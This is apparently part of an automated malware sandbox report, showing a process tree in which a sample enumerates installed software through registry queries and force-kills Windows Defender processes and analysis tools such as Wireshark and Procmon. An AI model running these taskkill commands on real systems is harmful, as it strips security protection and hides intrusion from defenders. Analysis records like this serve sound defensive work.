    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:1444
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1948
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1004
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1468
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:1452
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1416
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1432
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:324
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2004
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1168
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1208
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1548
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1452
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2044
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2004
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1516
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:964
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1252
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1468
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:1624
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1588
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1164
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:292
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1384
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1964
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:1636
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:1668
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:2040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:868
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1452
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:1572
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1540
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1956
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1608
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1728
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1956
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1576
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1616